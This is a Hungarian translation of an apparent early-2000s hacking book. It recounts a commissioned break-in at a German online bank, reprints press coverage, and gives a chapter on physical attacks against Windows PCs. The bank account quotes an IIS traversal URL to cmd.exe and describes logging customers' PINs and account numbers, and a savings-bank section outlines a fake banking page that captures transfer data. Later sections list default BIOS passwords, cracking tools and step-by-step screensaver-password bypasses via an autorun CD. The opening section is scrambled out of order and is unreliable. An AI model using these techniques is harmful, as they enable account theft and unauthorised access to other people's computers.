viszont bináris adatokat és metakaraktereket. 1. hogy gépeljék be 6. PIN kódjukat.böngészőből. környezeti változóként tárolódnak. és ezzel felhasználhatók más alkalmazások számára is. és ezután az echo+%HTTP_COOKIE% -val egyszerűen lehetett írni. mivel a bank scriptjei nem hajtanak végre bináris fájlokat. majd egy hiperhivat-kozáson keresztül lehetett letölteni. például a CMD. mint például a HTTP_AGENT vagy a Remote-IP minden kérdésnél.EXE-vel. amely szövegkarakterekből áll. ezért egyfajta shellt kaptak a böngészőn keresztül. letöltötték. Ebben a könyvtárban volt azoknak a fájloknak a nagy része. Ebben a könyvtárban volt egy alkönyvtár. A támadási tervről Bináris fájlokat ASP-scripttel írnak. az SSL miatt) tárolja a rendszer.: <. Alapvetően az echo DOS-paranccsal lehet fájlokba írni. A szerver támadhatóságának tesztelése A webszerver egy fatálisán szabványos exploitra volt érzékeny: http://www. majd törölték. A cookie-t mint HTTP_COOKIE-t tárolták. illetve nincs szükségük ilyenekre. át lehetett írni a bejelentkező-scriptet úgy. meg lehet írni a CMD. A bökkenő az írás volt. Az IIS „sípolta" a konzolfájlok kiadását. hogy ez a folyamat ne legyen olyan könnyen felfedezhető.EXE-t a /c paraméterrel (egyedüli parancs) futtatták. illetve töltenek fel. Hogy ezt a fájlt le lehessen tölteni. hogy az első lépés már el volt intézve. ami azután kényelmes olvasási és írási elérést kínálna. Az ügyfeleket felkérik. Figyelembe kellett venni.%c255winnt/system32/cmd. Azonosítás és kapcsolat A weboldalakhoz vezető útvonal így nézett ki: C:\Inetpub\Root\Bank. ha a CMD. Végül a fájlt törölni kellett. amelyeket az online banki szolgáltatás használ..vagy 10-jegyű online számukat. Tehát engedélyezett kapcsolatból kellett olvasni és írni. ezeket nem lehetett a böngészőn keresztül bevinni.3. és a kívánt bankot (a •••-t vagy a •••-t).. Tiltott kimenő kapcsolatok Az első terv az volt. ahhoz először a webkönyvtárba kellett másolni. hogy a bejelentkező adatok a felhasználói űrlapról közvetlenül egy logfájlba vándoroljanak. Amint a feltöltő-script a szerveren volt. és ezért a legrosszabb esetben háromszor olyan nagy lehetett volna. ami végrehajtáshoz vezet. Az adatok.de/scripts/. Az olvasási elérés nem volt probléma: az olvasandó fájlokat a webkönyvtárba másolták.. A sorokat tehát cookie-ként küldték el.7 Az adatletöltés A megváltoztatott scriptek a C:\Temp\ 000043FA.> nem lehetett írni. hogy egyszerűen féltőkének egy trójait.. Ez azonban meghiúsult azon. Mivel azonban az ASP-hez és a HTML-hez is metakarakterek szükségesek. l . amelyeknek a webszerver a környezete. hogy a metakaraktereket idézőjelekbe csomagolva a szintakszisnak megfelelően írták (az ASP-scripthez). PIN-jét és IP-jét. Megjegyzés: az adminisztrátor ezt a könyvtárat könyörtelelnül törölhette volna.exe Itt egy hibáról volt szó egy átadott parancs dekódolásánál és legitimációjánál.EXE-t. mint pl. amelybe csak egy kódolt kapcsolattal lehet bejutni. és ezért itt már nem kellett foglalkozni vele! . Az utolsó és legnagyobb dobás az volt. hogy tiltva voltak a kimenő kapcsolatok. Az ASP-scriptet.ini könyvtárban tárolják a bank ügyfeleinek folyószámlaszámát. mivel a sornak URL kódoltnak kellett lennie. a sok nem alfanumerikus karakter miatt. és a sorok „komplex" módon épülnek fel. A szövegkarakterekkel nem is volt gond. Ezeket az adatokat aztán egy Session Cookie-ban (kódolt.

04-től 2001. amelyet egy semleges közjegyzőnek adtak át Hamburgban.dat képernyője A logfájlokból kapott adatokkal most már be lehetett jelentkezni az ügyfelek folyószámlájára.A Bank. amelyben úgy ítéltek. Az adatokat végül az NDR jogi osztályának adták át.10. 1. A •• bank a Hamburgi Területi Bíróságon 2001. Egy folyószámla képernyője Egy részvény-portfólió képernyője S még arra is nyílt lehetőség. hogy egy pillantást vessenek az ügyfelek részvényletétjére. pineket. Ebben az időben több mint 1. és ott egy széfbe zárták. IP-címeket) mentettek le.08. ahol bezárták egy széfbe ezeket. Az NDR bizonyítékként csak egy másolatot tartott meg. hogy Ideiglenes Intézkedést adjanak ki. hogy minden adatot vissza kell szolgáltatni nekik. 1.31-ig folyt. 08.5 millió adatot (online számokat.04-én elérte.5 Összefoglalás Az említett eseményeket követően a könyv szerzője elbeszélgetett az ismert német biztonsági .4 Utóirat a bank-hackeléshez A logfájlok áthúzása 2001.

Ruef pontosan ismeri a gondot. A www." Azt mondta. hogy az ARD jogi részlege szerint az ilyesfajta oknyo-mozó újságírást megengedi a német jog. Láttam már olyan banki számítógépeket.com tudósításai Német tv-s hackerek bankszervert törtek fel per van kilátásban Ned Stafford. és információkat töltsenek le az ügyfelek számláiról. a bank szóvivője szerint jogi lépéseket tervez egy népszerű fogyasztói high-tech tv-show ellen. ezt nyilatkozta a Newsbytes-nak: „Amit tettek. millió és millió euró birtokában" mondta. az e~banking. aki 27 éve a Technical Adviser frontembere. ahová csak az ügyfelek léphetnek be megfelelő azonosítást követően (WWW/SSL/SHTTP/ jelszóvédelem). 17. Bernd Leptihn. 4:51 ••••. a bankok biztonsági problematikájáról. NÉMETORSZÁG 2001. a nyilvánosság informálása a ••• számítógépének hiányosságairól nagyon is a köz érdekében történt. Leptihn. Ösz-szességében azt kell. .kezekben van. du. aki amúgy jól ismert személyiség Németországban. a Technikai Tanácsadó (Ratgeber Technik) hírszerkesztő csoportjának hamburgi vezetője azt nyilatkozta a Newsbytes-nak. szept. hogy a legszívesebben abban a minutumban mondtam volna fel a folyószámlámat. A következőket mondta: „Sok bank webes fellépése megosztott. ha az „a köz érdekét szolgálja". íme két érdekes vélemény. erős irányvonalak.washingtonpost. PIN-számokat és internetes IP-számokat tartalmaztak. hogy van egy nyilvános rész. A Technikai Tanácsadó augusztusban felfogadott néhány fiatalembert. én 30 éve csinálok törvénytelen dolgokat. Az információk neveket. és ez meg is történik (a legújabb patchek. Ebben az összefüggésben újra és újra előkerült a biztonság kérdése.6 Sajtóbeszámolók A bank-hackelés világszerte nagy visszhangot keltett. Cornelia Klaila.. tűzfal-elemek és Intrusion Detection System) a pénzügyi szektorban aránylag gyakran a rendelkezésre áll (ellentétben más terület hálózati kapcsolattal működő cégeivel). most akárhol is lehetnénk a világban. Leptihn szerint. megfelelő biztonsági intézkedések). akikre utalt. Az erre hivatott rendszeradminisztrátorok. Marc Riief-fel. És persze vannak olyan intézmények is.. az törvénytelen. Ezeknek az adminisztrációja is többnyire jó . amelyek kitűnő kompetenciával tűnnek ki. így ékelődött: „Tudják. Azután van egy félig nyilványos terület..newsbytes. A sztorit vasárnap este közvetítették. hogy betörjenek a ••• online banki szerverébe. ami gyakran így is történik (nem viszik túlzásba a biztonsági mechanizmusokat és irányvonalakat). Newsbytes MÜNCHEN. mivel néhány nagy bank biztonsági tanácsadója. Ezzel azt akarom mondani. „A (bankszámla) információkkal.de sajnos nem nagyon jó . de mostanáig soha nem vesztettem el egyetlen ügyet sem. biztonsági megbízottak vagy auditorok nem tudnak mit kezdeni a biztonsági rendszer logfájljaival. amelyek fontosak a biztonságos online banki szolgáltatáshoz. mivel nincs meg a szükséges háttértudásuk. Nagyon törvénytelen. de most a kamera mögött dolgozik. Számtalan újság és rádióállomás számolt be az akcióról.szakértővel. Mindenesetre bőven van még tennivaló. amelyeknek a birtokába jutottunk. hogy feltörjék a bank online banking szerverét. a Technikai Tanácsadó nevű tv-show. Az e-banking területet védeni kell. hogy nem aggódik a ••• perindítása miatt. Az „ők". Németország egyik legnagyobb bankja. hogy mondjam: vannak ilyenek és olyanok is. amelyet az ARD. A megfelelő szoftver és hardver a naplózáshoz és a biztonsághoz (pl. Nem szabad valamennyit egy kalap alá venni.com és a www." 1. A nyilvános részt elhanyagolhatják. Voltak pereim ezelőtt is. számlaszámokat. Szerintem a bökkenő a kiértékelésnél van. a ••• müncheni szóvivője. biztosított rendszer. amelyet mindenki elérhet (WWW/HTTP). Németország két közszolgálati tévéhálózatának egyike gyárt. amely hackereket szerződtetett.

beleértve titkos kódokat (PIN). hogy a weboldalt a szokásos rendszeres karbantartás és nem a biztonsági rések kijavítása miatt állították le. hogy a kutatás megmutatta. a régi és az új is online-ban voltak.7 Tapaszatalatok más bankoknál Nem csak a ••• nincs felvértezve a támadások ellen." Weide és Leptihn elmondták. a hackereknek dispo-kredit adatokat is sikerült elérniük. „Még el kell döntenünk. A fiatal hackerek inkább abban voltak érdekeltek. ezt nyomatékosan kétségbe vonta. A régi weboldalt szeptember elején offline-ba helyezték. egy új log-in redszert vezettek be. a számlákat a kimerítésig terhelhették volna. Weide azt nyilatkozta a Newsbytes-nak. és „igazán nem volt gond. szeptember 17. azt mondta: „Nem mondtak csúnya szavakat. az online-számokat (TAN) és az IP-címeket. hogy bűntetőjogi és polgári peres kártérítési per is lehetséges a Technikai Tanácsadó ellen. A Ratgeber szerkesztősége szerint azért a •••. Klaila azt mondta. Miután a magazin figyelmeztette a •••-t központi számítógépének a hiányosságaira. Klaila. „A hackereink ismét próbálkoztak az új site-on." . Ahogy az ARD a továbbiakban közölte. Weide azt mondta. és hogy ez az oldal state-of-the-art rendszer. 1.mondta. hogy a ••• bank ezen a nyáron egy új online weboldalt helyezett üzembe. hogy elveszítik az állásukat. bárki meg tudta volna tenni. és sikerrel jártak" -állította. hogy mennyit fizettek nekik. mert ez a bank különösen „lukacsosnak" bizonyult a jogosulatlan hozzáférésekkel szemben. Az adó által felfogadott hackerek azonban ebben az átdolgozott programban is találtak réseket. és a hackerek a régi weboldalra. Leptihn viszont vitatta. hogy a ••• banknál bizony van néhány nagy biztonsági rés. Azt hiszem. a bank szóvivője. hogy ő és a csapata részt vettek egy telekonferenciás hívásban a ••• technikai személyzetével. hogyan tudják befoltozni a réseket. A tévéadó komputeres szakemberei ismételten óvtak a trójaiktól. féltek.Leptihn arra is utalt. ami biztonságos. 2001. és nem az újra törtek be. amelyek értelmetlenné teszik a pénzintézet kódolási eljárását. s így. 22 évesen a Multimedia Network Systems cég ügyvezetője Leinefeldében. Még egy laptoppal és egy adatátvitelre alkalmas mobiltelefonnnal is gond nélkül lehet jogosulatlanul pénzt átutalni. Augusztus hónap folyamán . hogy a ••• online banking oldala vasárnap késő éjjeltől kezdve úgy hat órára leállt. hogy megmondják nekik. Négyük közül az egyik Stephan Weide. működő kamera előtt törték fel a ••• biztonsági mechanizmusait. s azt állította. hogy az új oldal az utolsó éjszaka előtt biztonságos lett volna." Miután a Technikai Tanácsadó vasárnap éjszaka a tévében megszellőztette az ügyet. de ez „nem volt sok".. A bank a Microsoft Internet Information Serverét (IIS 4. mit is akarunk tenni. A Technikai Tanácsadó megbízott egy négytagú hackercsapatot.vélekedett.t választották. Behatolásuk bizonyítására a betolakodók csupán egy 100 márkás könyvelésre „korlátozták magukat". Azt nem árulta el.0) használta.mint mondta mindkét oldal. A zdnet. De elvileg sok más banknál és takarékpénztárnál is lehetséges lenne egy virtuális betörés. hogy a betörés a ••• számítógépébe csak két-három napot vett igénybe. 08:46 óra Thüringiai hackerek a Ratgeber: Technik ARD-magazin megbízásából. Azt is jelezte.5 millió online könyvelési akciót megszerezni. más bankoknál is csak félig-meddig .de News tudósítása ARD: Online banki szolgáltatásbeli hiányosságokat lepleztek le PIN-eket és TAN-eket olvastak ki bekapcsolt kamera előtt. így a szerkesztőknek és a szakértőknek a műsor adatai szerint lehetővé vált néhány napon belül 1. hogy a technikaiak hangot adtak-e haragjuknak a hackelés miatt. Mikor megkérdeztük. hogy publicitást nyerjenek induló internetes biztonsági tanácsadó cégüknek .

A második terület a tulajdonképpeni e-banking. a következő terv született. amelyben az ügyfél az illető tararékpénztárról információt szerezhet. egy maghatározott URL begépelésével Itt az átmenet a home-bankinghoz . amelyek nagyon támadhatóvá teszik a szervert. Többnyire egy helyben lévő vagy szolgáltatón keresztül kezelt szerverről van szó. Van a nyilvános rész. 1. Ezen a webszerveren gyakran tisztán reprezentatív célokból futnak olyan alkalmazások. hogy egy támadás ez ellen a számítógép ellen semmiféle sikerrel sem járna.1 Forgatókönyv a takarékpénztár-területen 2001 októberében a szerző újabb megkeresést kapott valakitől. Bepillantás egy német tararékpénztár jelszó-fájljába. Nyíltszívűen . A tapasztalatokból. amelyeket az előző akciókból gyűjtöttek.sikeresek a szerverük védelmére irányuló intézkedések. A szerverek többnyire jól védettek. Ez általában egészen egyszerű felépítésű. mint a legtöbbnek Németoszágban: két részből áll. amely csak nagyon egyszerűen védett.7.a kleinmusterhauseni takarékpénztár Ennek a tararékpénztárnak olyan az internetes megoldása. Ezt a takarékpénztáraknál gyakran számítóközpontok kezelik. aki a különböző bankok visszásságainak a feltárására tararékpénztárak biztonsági auditjával bízta meg. és a rendszergazda is szívesen elhanyagolja. és ki lehet indulni abból. és amelyen keresztül egy linkkel a folyószámlájához jut.

illetve takarékpénztár nyilvános szerverének az elérését. A betörés után megváltoztattak minden oldalt. amelyen többnyire HBCI-eszközök meghajtóit vagy különböző online banking szoftverek frissítéseit tárolják. amely lehetővé teszi az illető bank. Isten hozta a tararékpénztárnál -csak az URL-nek kell a megfelelőnek lenni Példa egy tararékpénztári oldal forrásszövegére megfelelő linkeléssel a számítógép-központhoz A hamisítvány veszi át a szerepet A megfelelő oldal külleméről és működési módjáról rendelkezésre álló információk alapján . Ez ebben az esetben egy script-hiba vagy egy hibás FTP-szerver lenne. amelyek a számítóközpontban elhelyezett tulajdonképpeni e-banking gépre mutattak.A támadási terv Először egy biztonsági rést próbáltak keresni.

hozzákezdtek egy hamisítvány felépítéséhez. Mivel a tranzakciók egyike sem lesz végrehajtva. a tranzakciószámok továbbra is érvényben maradnak. „A kockázatokról és mellékhatásokról kérdezze banki tanácsadóját!" . Az ügyfél ugyanazokat az információkat és opciókat látja maga előtt. Ha most egy átutaláshoz beírja az adatokat. ezek az adatok egy logfájlban landolnak. Ez a hamisítvány a tuljdonképpeni e-banking számítógépet „tükrözné". tehát az ügyfeleket a helyi tararékpénztár prezentációjáról a megváltoztatott Folyószámla vagy Onlinebanking link közvetlenül a hamisítványra vezeti. hanem csak a logfájlba vándorol. mint a valódi e-banking gépen.

és hogyan működnek? 2.merevlemez-fejreállás.2.2.vagy hálózati felhasználók. az NT és utódai között 2.1 Érdekes jelszavak szinte mindenütt akadnak 2.4 További támadási technikák .3.1 Különbségek a Windows 9x.3 Jelszavak a Windows 2000 alatt 2.3 A távoli elérésű támadás internet.a betörés előkészítése CD-vel 2.2 A jelszavak kikémlelése 2.3.2 Mik azok a szkennerek. fejezet .2.2.1.4 Automatikus lejátszás .1.1 A hackeren túl .Tartalom 2.2 A fizikai támadás 2. vigyázat! 2.veszélyes biztonsági rések 2.3 Milyen lehetőségeik vannak a betolakodóknak? 2.3 Képernyővédő-jelszó .6 Óvintézkedések 2.2 A jelszófájlok 2.és nyomtatómegosztás .3.3.3. adatbetekintés vagy lopás 2.1.5 Brute Force-rohamok a megosztási jelszavak ellen 2.3.1 A fájl.a bennfenteseknek nem okoz problémát 2.1.4 Jelszóval védett megosztások 2.

mint köztes fokozat. Az egyik a fizikai támadás. amely növeli a biztonságot. a hackereknek arra is vannak módszereik.1. illetve feltörésének három alapvető módját különböztetjük meg: • általános jelszó használata a jelszó megszerzése a memóriából • a CMOS szoftverének törlése . és azokról a veszélyekről. Ráadásul a felhasználói operációs rendszerek gazdái is nagyon megkönnyítik a támadók dolgát. 2. A magánfelhasználók. hogy ezt a védelmet megkerülve jussanak be a rendszerbe. a másik a távoli elérésű támadás.a legtöbb? . például egy lopásét.A Windows-rendszerek (9x.0 és Windows 2000) tervezésénél sokkal tudatosabban koncentrált erre a témára. Az NT vagy a Windows 2000-es gépeknél ott van még a jelszavas bejelentkezés. hogy behatoljanak a rendszerekbe. a professzionális területre készült termékek (Windows NT 4. mielőtt a grafikus felület megjelenne. ennek ellenére rengeteg más lehetőség is van hozzáférni a személyes adatokhoz: otthon vagy az irodában alapvetően mindenki odaülhet a géphez . A Windows 95/98/ME-t érő támadásoknak két fajtáját kell megkülönböztetni. még figyelembe se vettük: ugyan ki szeretné az utolsó adóbevallását vagy bizonyos leveleit rossz kezekben tudni? Az egyedülálló PC-t ugyan inkább a külső hatások (vírusok. amelyeknek az adataikat kiteszik. Alapigazság. akik a Windows XP Home Editionnel fognak dolgozni) többnyire csak csekély ismeretei vannak a biztonságról.) vagy a hibás kezelés veszélyezteti. és vele együtt a BIOS. ami igazán csak most. Míg a Windows 95/98/ME fejlesztésénél a Microsoft a felhasználóbarátság kedvéért elhanyagolta a biztonságot. És akkor a további kockázatokat. Emellett az NT-nél és a Windows 2000-nél az adatokat már eleve zárolni lehet. Sajnos. amelyet a felhasználónak a számítógép minden indításához be kell írnia. NT. azt a későbbiekben megmutatjuk.esetben egyáltalán nem történik meg. hogy minél öregebb egy számítógép. Manapság szinte minden számítógép-használónak vannak olyan adatok a gépén. A BIOS-jelszavas lezárás megkerülésének.2 A fizikai támadás A számítógépek védelmének nem túl gyakori módja a BIOS-jelszó beállítása. amelyet az internetről indítanak. ha 2. 2000) gyenge pontjai a számítógép ebédszünetben bekapcsolva marad. amit olyan valaki hajt végre. illetve feltörni a védelmet. Hogy mennyire biztonságosak a jelszóval védett képernyőkímélők. de gyakran még a vállalatok is visszariadnak egy jó tűzfal költségeitől. adatbetekintés vagy lopás A biztonság tulajdonképpen az adatok biztosítási lehetőségeinek az alapvető mérlegelésénél kezdődik. A hackereket egyenesen csalogatják a gyenge pontok.1. ami a BlOS-jelszónál kezdődik. az XP-vel fog megszűnni: az eddigi Windows 9x vonal csak korlátozott védelmet (BIOS-jelszó) kínál a jogosulatlan felhasználás ellen. annál könnyebb kikerülni. amelyeknek az elvesztése.1 A hackeren túl . illetve az újbóli előállítása a PC árának többszörösébe kerülne. A Windows 95/98/ME felhasználóinak (és valószínűleg azok nagy részének is. akinek közvetlen elérése van a rendszerre. ami sok . vagy a kényelem kedvéért lemondanak a BIOS-jelszóról. ez a fejezet az adatbiztonság egészével foglalkozik. ami a 9x-nél kiegészítő szoftvertől függ. 2. Így a felhasználók ezekkel az operációs rendszerekkel a jövőben is könnyű prédái lesznek mindenfajta hackertámadásnak.1 Különbségek a Windows 9x. Mivel az adataink nem csak az internetes szörfözés közben vannak veszélyben.merevlemez-fejreállás. az NT és utódai között A különböző operációs rendszerek közötti alapvető különbség.és még a legfifikásabb BIOS-jelszó sem ér sokat. lopás stb.

M. ha a biztonságáért aggódó felhasználó egyszer el találná felejteni a jelszavát. Gyártó: Award BIOSSTAR BIOSTAR ALFAROME q_127&z J64 Password-BlOS-Hacker Oren Levytől Program AMIDECOD Award Modular Bios crack tool CrackAmiBios 1.hackerzbook. A BIOS törléséhez megint csak segédprogramokat használnak a „betörők".hackerzbook. de valójában a legtöbbnél kérdéses. . Ezeknek a jelszavaknak a többségét sikerrel teszteltük. Azt persze figyelembe kell vennie. AMI?PW AMI?SW AMI_SW AMI Gyártó: Phoenix PHOENIX phoenix CMOS BIOS Altalános jelszavak aLLy Wodj SZYX Syxz Sxyz SKY_FOX setup AMI általános Password (C)alculator AWARD J262 J256 j262 j256 AWARD_SW 589589 AWARD_PW AWARD_PS AWARD?SW AWARD SW AWARD 589721 Általános BlOS-jelszavak Programok a jelszó kiderítéséhez a memóriából SER LKWPETER Ikwpeter HLT A CMOS szoftverének törlése Ha a hacker nem talál általános jelszót vagy megfelelő segédprogramot.I. A különböző BIOS-verziókhoz különböző programok vannak. hogy vajon még működnek-e. mint törölni a BIOS-t.de www.de AMI Award Gyártó: AMI PASSWORD Ami A.hackerzbook. vagy már teljesen elavultak.hackerzbook. és minden BIOS-verzióhoz használható.1 Password for AWARD BIOS BIOS Szerző Danny Soft The Immortal Ismeretlen Oren Levy . A KiLLCMOS32 minden BlOS-beállitást megbízhatóan töröl CONDO awkward BIOSTAR A jelszó megszerzése a memóriából A jelszó memóriából történő megszerzése feltételezi.de www. a használatuknál azonban figyelni kell az amerikai billentyűzetkiosztásra. Ezeket a jelszavakat számos oldalról be lehet szerezni az interneten. Ez a segédprogram minden beállítást töröl.de www.Általános jelszó használata A különböző BIOS-verziók gyártói adnak egy általános vagy default jelszót. Ezekkel a jelszavakkal a számítógépet az utoljára használt és mentett jelszótól függetlenül lehet elindítani. Mindenesetre a rendszernek már futnia kell a használatához.de www. hogy a gép már elindult.hackerzbook. ilyenkor ugyanis segédprogramokkal el lehet érni a memóriában tárolt jelszót. hogy ilyenkor a rendszerbeállítások is elvesznek. ezek közül az egyik legismertebb a KiLLCMOS32. arra az esetre.Dynam ic FalCoN 'N' AleX Forrás www. amelyeket könnyen be lehet szerezni az internetről. és azzal együtt a jelszót is. nem marad más hátra.

A program egy érvénytelen értéket helyez el a CMOS-ban, és ez úgy hat, hogy minden ott tárolt adatot (a jelszót is) újra meg kell adni. A használatának a feltétele azonban az, hogy a számítógép már működik, és szabad a hozzáférés. A http://www.memosys.com/passwort/faq.htm címen további információk találhatók a BIOS-jelszavakról. A jobban informált internet-felhasználók néha azt hiszik, hogy egy rendszert csak az internetről érhetnek támadások, és ez ellen egy tűzfallal jól meg is védik a gépüket. De mi van akkor, ha valaki mondjuk az ebédszünetben fizikailag fér hozzá a számítógéphez? Milyen módszereket fog alkalmazni, hogy kikerülje a képernyővédőt és jelszavakat olvasson ki?

A Windows a jelszó megerősítését kéri

2.1.3 Képernyővédő-jelszóa bennfenteseknek nem okoz problémát
Hogy a számítógépünk rövid távolléteink alatt is védve legyen a kíváncsi szemektől, arról a Windows 95/98/ME alatt a legegyszerűbben képernyővédőjelszóval gondoskodhatunk. Ez a képernyővédő bekapcsolása után csak a megfelelő jelszót megadó felhasználónak engedi meg a rendszer elérését.
Ha a Windows csővezetéket épít vagy Beziergörbéket mutat - csak jelszóval lehetséges a visszatérés

így lehet feltörni a jelszóvédelmet
Az alábbiakban megvilágítjuk, milyen könnyű egy képernyőkímélő jelszavát kikapcsolni, illetve kikerülni, ha a hackernek ehhez elég ideje és tudása van.

Újraindítás
Windows 95/98/ME alatt a Képernyő tulajdonságai ablakban a Képernyőkímélő regiszterlapon a képernyőkímélő bekapcsolása után zárolni lehet a rendszer elérését. Ha mások is hozzáférnek a PC-nkhez, alapvetően be kell állítanunk ezt a jelszót, mert különben könnyen űzhetnek velünk csúnya tréfát: képzeljük el, hogy valaki három perc után induló jelszavas képernyővédőt állít be a gépünkön. Ezután elég egy rövid szünet (telefon vagy hasonló), és máris megakasztotta a munkánkat. Hiszen jelszó híján nem jutunk a PC-hez újraindítás nélkül. Akkor viszont elveszhetnek az adatok, amelyeket esetleg még nem mentettünk el - nagy az ár. Igazán dühödt, primitív, de hatásos módszer a képenyőkímélő-jelszó kikerülésére: a számítógép újraindítása a rését gombbal. Figyelembe kell venni, hogy a nem mentett adatok minden esetben elvesznek, így például a nem mentett Word-dokumentumok vagy a nyitott fájlok stb. Szerencsére ilyenkor a rendszer felhasználója észreveszi a behatolást.

Taskmanager - kapu a betörőnek Windows 95 alatt
Windows 95 alatt a Microsoft még egyszerűbb módot kínál a képernyőkímélő kikerülésére: a Ctrl+Alt+Del billentyűkombináció lenyomásával • mondhatni „majomfogással" - célzottan be lehet zárni a képernyőkímélő program taskját.

Rossz csillagzat alatt született a védelem: egy egérkattintással be lehet zárni a képernyőkímélőt

A Windows 95/98/ME a CD-ROM-meghajtóhoz alapértelmezésként az autoplay (automatikus lejátszás) opciót használja, amelyet a Microsoft Knowledge Base Article Q141059 a következőképpen definiál: „A Windows folyamatosan ellenőrzi a CD-ROM-meghajtót, hogy megállapítsa, helyeztek-e bele CD-ROM-ot. Ha ilyen lemezt fedez fel, ellenőrzi, hogy van-e rajta autorun.inf-fájl. Ha a CD tartalmaz ilyen fájlt, akkor végrehajtja a fájl open= sorába írt parancsokat." Megjegyzés: ezt a témát még a 4.fejezet is tárgyalja, mert az automatikus lejátszás funkciót gyakran használják trójai vírus becsempészésére idegen rendszerekbe. Ehhez lehet a rendszer esetleg futó internetkapcsolatait (vagy hálózatoknál a LAN-kapcsolatokat) használni, és így a PC-hez a képernyőkímélő-jelszó ellenére hozzá lehet férni. Ha a trójai már bent van, a képernyőkímélő-jelszót egészen egyszerűen ki tudja kerülni. Egy ilyen hozzáféréssel a képernyőkímélő-jelszót is ki lehet kapcsolni úgy, hogy: HKEY_CURRENT_USER/Control Panel/desktop/ScreenSaveActive Registrykulcs értékét nullára állítjuk. Van néhány program, amelyeket az automatikus lejátszás funkcióval, a jelszómegadást kikerülendő, fel lehet másolni. Ezeknek a programoknak egyike a Clean Screen. Íme, a használati utasítás, amellyel szükség esetén magunkat is kiszabadíthatjuk (az előkészületeket azonban előre meg kell megtenni, nehogy túl késő legyen): 1. Letölteni (www.hakerzbook.de) és kicsomagolni a ZIP fájlt! 2. Az EXE fájlt és az autostart-ini-t CD-re írni. A két fájlnak a könyvtárfán egészen felül kell lennie, tehát ne valamilyen alkönyvtárba másoljuk. 3. Ha a CD-írás elkészült, akkor egyszerűen próbáljuk ki egyszer a saját PCnken. 4. Képernyőkímélő-jelszó beállítása, majd várakozás, míg a képernyőkímélő elindul. 5. Tegyük az újonnan megírt CD-t a meghajtóba, és várjunk, amíg a PC hangszórója sípolni kezd. Ha nincs bekötve, egyszerűen várjuk ki, míg a CD-ROM-meghajtó leáll. 6. Ezután már csak írjuk be a jelszó lekérdezésére az 123-at, és a képernyőkímélőnek el kell tűnnie!

Védelmi lehetőség Windows 95 felhasználóknak
Ez ellen a támadás ellen csak a Windows 95 Windows 98/ME-re frissítése nyújt védelmet. A képernyőkímélő-jelszó elkerülésének ilyen kísérletei az NT/2000-nél is hatástalanok. A későbbiekből az is ki fog derülni, hogyan is lehet feltörni az ilyen jelszót, mert a jelszavas védelem is csak korlátozott mértékben nyújt biztonságot. A jelszó megfejtése a megfelelő szoftvereszközzel igazán egyszerű, jobb, ha tudjuk, hogy mennyire az. így persze rögtön magunkon is segíthetünk, ha elfelejtettük a saját jelszavunkat.

2.1.4 Automatikus lejátszás a betörés előkészítése CD-vel
A PC-t a BIOS-szal, a képernyőkímélőt jelszóval zároltuk, és talán még a jelszót is úgy választottuk meg, hogy az betűk és számok kombinációjából álljon - most aztán a PC-nk szünetben is bevehetetlen, vagy lehet, hogy mégsem? A következőkből kiderül, hogy milyen eszközöket vethet be ebédszünetben egy potenciális hacker, hogy minden igyekezetünk ellenére hozzáférjen az adatainkhoz.

7. Ezután a program kiírja a régi jelszót, és a Régi érték beállítása paranccsal vissza lehet állni rá. Ha ezt nem tesszük meg, aktuális jelszóként a 123-at tárolja.
A képernyőkímélő-jelszó megszerzése autoplay CD-vel

A képernyőkímélő jelszó kikódolása A képernyőkímélő jelszót a Windows 95/98/ME alapértelmezésként a HKEY\USERS\.Default\Control Panel\Sreen_Save_Data Registry-kulcsban tárolja. A kódolása nagyon egyszerű, és számos programmal feltörhető. A legtöbb programnak az a hátránya, hogy csak akkor működik, ha a képernyőkímélő még nem aktív (hogy mit tehetünk, ha már az, azt már tudjuk).
Jelszófeltörő program működés közben

Védekezés az automatikus indításos támadások ellen Ezeket a támadásokat úgy védhetjük ki, ha a Windows 95/98/ME alatt kikapcsoljuk az automatikus lejátszás funkciót. Ez a következőképpen működik: A Vezérlőpulton kattintsunk duplán a Rendszerre, válasszuk az Eszközkezelő fület, kattintsunk duplán a CD-ROM-ra, és aztán a CD-ROM meghajtófára. A Beállítások regiszterlapon távolítsuk el a pipát az Automatikus lejátszás elől.
Itt találjuk a döntő fontosságú pipácskákat

Néhány program a képernyőkímélő-jelszó feltöréséhez:
Program SCR-it! - 1 .0 verzió SCRNLOCK SS_D 1.0 Win95 Screen Saver Password Cracker v1 . 1 Programok a képernyőkímélő-jelszó feltöréséhez Szerző Yoto Yotov Yoto Yotov Bubble nobody weboldal www.hakerzbook.de www.hakerzbook.de www.hakerzbook.de www.hakerzbook.de

2.2 A jelszavak kikémlelése 2.2.1 Érdekes jelszavak szinte mindenütt akadnak
A helyi támadásoknál nagy szerepe van a jelszavak kikémlelésének. Jelszófeltörők segítségével a hackerek szinte minden, Windows alatt tárolt jelszót meg tudnak szerezni, hogy azután elérjenek velük jelszóval védett fájlokat, az

pwl lesz. Ezek az ügyek azonban az államügyész adatai szerint már egy fél évvel ezelőttiek. (dpa) Forrás: www. Praktikus segítség a felhasználóknak és a betörőknek .. A mit sem sejtő felhasználók számlájára esetenként akár havi 20 ezer márkáért is interneteztek. a telefonos kapcsolat jelszavai és a Windows bejelentkező nevek.mondják. A Windows 95/98/ME alatt minden program eléri a PWL fájlokat. mert akár odáig vezethet. 30 feltételezett tettesből álló kör több ezer számítógép-felhasználó jelszavát törte fel . A PWL a PassWord Library rövidítése.. hogy adatokat tudjon elhelyezni bennük. Példa: ha a Windowsba Jani néven jelentkezünk be. Erre egyszerű példák találhatók az Internet Explorernél és a telefonos kapcsolatnál. A hackerek a jelszavakat még az idevágó weboldalakon is nyilvánossá tehették .az automatikus kiegészítés A dortmundi államügyészségnél több mint 1000 eljárás van folyamatban gyanúsítottak ellen egész Németországban.számol be a Der Spiegel hírmagazin nemrégiben megjelent tudósítása. a felhasználó költéségén szörfözhet az interneten.de Internetezzünk olcsón sokkal több nem is kell hozzá Az így tárolt információkat egy jelszófeltörő segítségével nagyon könnyű kiolvasni. Jelszavak ezreit törték fel de. hétfő . Az Internet Explorer a 4. Münsterben már 3600 nyomozási eljárás lezárult. Minden felhasználói profil tartalmaz egy saját PWL fájt.2. az adatokat kiolvasva. Különösen veszélyes ez a telefonos kapcsolatnál. illetve ezek bizonyos területeit. így tárolódnak például a meghajtók és a nyomtatók hozzáférési jelszavai. A dortmundi és a münsteri államügyészség két nagy ügyében kerek kétmillió márkára becsüli a károkat. A kódolt jelszó az első pillantásra még ártalmatlan Németország: Hackerek milliós csalása A nyomozók hackerek nagy szabású csalásainak a nyomára bukkantak. amely a belépési adatok megadása után megkérdezi a felhasználótól. íme egy 